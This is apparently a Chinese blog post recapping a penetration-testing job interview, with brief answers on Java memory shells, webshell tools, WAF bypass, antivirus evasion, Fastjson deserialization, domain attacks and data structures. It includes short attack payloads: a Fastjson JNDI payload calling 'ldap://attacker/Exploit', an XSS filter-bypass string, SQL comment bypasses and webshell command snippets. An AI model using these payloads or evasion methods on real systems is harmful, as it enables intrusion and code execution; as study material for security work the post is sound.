2025年渗透测试面试题总结-某四字大厂面试复盘 一面(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[某四字大厂面试复盘 一面](#某四字大厂面试复盘 一面)

[1. Java内存马的原理和利用](#1. Java内存马的原理和利用)

[2. 冰蝎与哥斯拉原理](#2. 冰蝎与哥斯拉原理)

[3. 绕WAF实战经验](#3. 绕WAF实战经验)

[4. Webshell免杀原理](#4. Webshell免杀原理)

[5. CS与MSFvenom结合免杀](#5. CS与MSFvenom结合免杀)

[6. Fastjson反序列化](#6. Fastjson反序列化)

[7. 红黑树与HashMap原理](#7. 红黑树与HashMap原理)

[8. 内网渗透与域控实战](#8. 内网渗透与域控实战)

[9. SQLMap原理](#9. SQLMap原理)

[10. MySQL B+树优势](#10. MySQL B+树优势)

[11. PHP与Golang安全问题](#11. PHP与Golang安全问题)


某四字大厂面试复盘 一面

复制代码
java内存马的原理和利用
如何查杀javan内存马,分别从工具和原理角度说说
冰蝎和哥斯拉了解吗,讲讲原理
有绕waf的实战经验吗,从各种漏洞的角度讲下
熟悉webshell免杀吗,讲下原理
做过其他免杀吗,比如结合cs和msfvenom的
谈谈fastjson反序列化原理和常见利用链吧
红黑树原理
hashmap原理
内网渗透、域控相关的实战经验
java反序列化cc链实战原理
sqlmap原理
Mysql为什么要用b+树
linux内核的漏洞
python的沙箱逃逸
python的flask模板注入
抽象语法树
rasp的概念和原理
rasp的对抗
php和golang语法本身的安全问题
1. Java内存马的原理和利用
  • 原理

    • 内存马是一种驻留内存的恶意组件,通过动态注册Servlet/Filter/Listener等组件实现持久化。常见类型包括:
      1. Filter型内存马 :利用javax.servlet.Filter 接口动态注册恶意过滤器,拦截请求执行命令。
      2. Servlet型内存马 :通过ServletContext.addServlet() 注入恶意Servlet。
      3. Listener型内存马 :注册恶意监听器(如ServletRequestListener)在请求到达时触发。
    • 利用链:通常通过反序列化漏洞或框架特性(如Spring的Controller参数绑定)注入。
  • 查杀方法

    • 工具
      • Arthas/JProfiler:分析JVM内存中的类加载情况,定位可疑类。
      • Java-memory-shell-scanner :扫描Tomcat的StandardContext中的动态注册组件。
    • 原理
      • 动态类检测 :监控ClassLoader加载的类,识别非标准类路径的恶意类。
      • 组件链分析 :检查web.xml 与内存中组件的差异,如未注册的Filter/Servlet。

2. 冰蝎与哥斯拉原理
  • 冰蝎
    • 通信加密:动态密钥AES加密请求/响应,密钥通过首次请求的MD5哈希生成。
    • 流量特征:HTTP Body为Base64编码的加密数据,Header中无固定特征。
  • 哥斯拉
    • 多协议支持:支持HTTP、HTTPS、DNS隧道,流量可伪装为正常业务。
    • 载荷混淆:通过异或加密和随机参数名绕过WAF检测。

3. 绕WAF实战经验
  • SQL注入
    • 分块传输:利用HTTP分块编码绕过正则匹配。
    • 内联注释 :如/*!50000select*/绕过黑名单。
  • XSS
    • HTML实体编码 :如<img src=x onerror=alert(1)>转为<img src=x &#x6F;nerror=alert(1)>
  • 文件上传
    • 扩展名混淆 :如.php5.phtml绕过后缀过滤。
    • Content-Type绕过 :伪造为image/jpeg

4. Webshell免杀原理
  • 代码混淆
    • 反射调用 :如Class.forName("java.lang.Runtime").getMethod("exec")
    • 加密加载:使用AES加密Shell代码,运行时解密执行。
  • 框架伪装
    • Spring Interceptor:注册恶意拦截器,伪装为业务组件。
    • JSP EL表达式 :如${pageContext.request.getParameter("cmd")}

5. CS与MSFvenom结合免杀
  • Staged Payload分离:生成无特征的Stager,通过DNS或HTTP分段加载Shellcode。
  • 进程注入
    • 使用MSF生成Raw格式的Shellcode,通过Cobalt Strike的execute-assembly注入到合法进程(如explorer.exe )。
  • 内存加密:通过AES-CBC加密Shellcode,加载时动态解密。

6. Fastjson反序列化
  • 原理 :利用@type指定恶意类触发Getter/Setter链,如:json

    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker/Exploit"}

  • 利用链

    1. JNDI注入链(JdbcRowSetImpl)。
    2. TemplatesImpl链 :通过_bytecodes字段加载字节码。
  • 防御 :升级至Fastjson 1.2.68+并开启SafeMode


7. 红黑树与HashMap原理
  • 红黑树
    • 平衡规则
      1. 节点为红或黑。
      2. 根和叶子(NIL)为黑。
      3. 红节点的子节点必须为黑。
      4. 任意路径黑节点数相同。
    • 操作代价:插入/删除后通过旋转(左旋/右旋)和变色维持平衡。
  • HashMap
    • 结构:数组+链表/红黑树(JDK8+)。
    • 哈希冲突:拉链法处理碰撞,链表长度>8时树化。
    • 扩容机制:负载因子默认0.75,容量翻倍重新哈希。

8. 内网渗透与域控实战
  • 横向移动
    • Pass-the-Hash:利用Mimikatz获取NTLM哈希,通过SMB协议横向。
    • MS17-010:利用永恒之蓝漏洞攻击未修补主机。
  • 域控攻击
    • DCSync:模拟域控制器同步用户哈希。
    • Golden Ticket:伪造Kerberos TGT票据获取域管理员权限。

9. SQLMap原理
  • 注入检测
    • 布尔盲注:通过页面响应差异判断条件真假。
    • 时间盲注 :利用SLEEP()函数检测延迟。
  • 数据提取
    • UNION查询:通过联合查询获取数据。
    • OOB通道:利用DNS/HTTP外带数据。

10. MySQL B+树优势
  • 结构特性
    • 叶子节点链表 :支持高效范围查询(如WHERE id BETWEEN 10 AND 20)。
    • 高扇出:非叶子节点仅存储键,减少磁盘I/O次数。
  • 对比B树:B+树所有数据存储在叶子节点,查询稳定性更高。

11. PHP与Golang安全问题
  • PHP
    • 弱类型 :如"0e123456" == "0"返回true
    • 反序列化漏洞 :如__wakeup()__destruct()中的代码执行。
  • Golang
    • 接口误用 :如空接口interface{}类型断言失败导致Panic。
    • 依赖漏洞 :第三方库未校验输入导致RCE(如旧版go-yaml)。
相关推荐
北京耐用通信4 分钟前
神秘魔法?耐达讯自动化Modbus TCP 转 Profibus 如何为光伏逆变器编织通信“天网”
网络·人工智能·网络协议·网络安全·自动化·信息与通信
Ronin30513 分钟前
【Linux网络】Socket编程:UDP网络编程实现Echo Server
linux·网络·udp·网络通信·socket编程
aloha_78932 分钟前
新国都面试真题
jvm·spring boot·spring·面试·职场和发展
唐叔在学习1 小时前
pip安装太慢?一键切换国内镜像源,速度飞起!
后端·python
Gz、1 小时前
Spring Boot 常用注解详解
spring boot·后端·python
起风了___1 小时前
Python 自动化下载夸克网盘分享文件:基于 Playwright 的完整实现(含登录态持久化与提取码处理)
后端·python
唐天下文化1 小时前
展厅迎宾机器人:豹小秘2如何打造科技第一印象
人工智能·科技·机器人
我是华为OD~HR~栗栗呀1 小时前
测试转C++开发面经(华为OD)
java·c++·后端·python·华为od·华为·面试
Dream it possible!1 小时前
LeetCode 面试经典 150_哈希表_快乐数(45_202_C++_简单)(哈希表;快慢指针)
leetcode·面试·散列表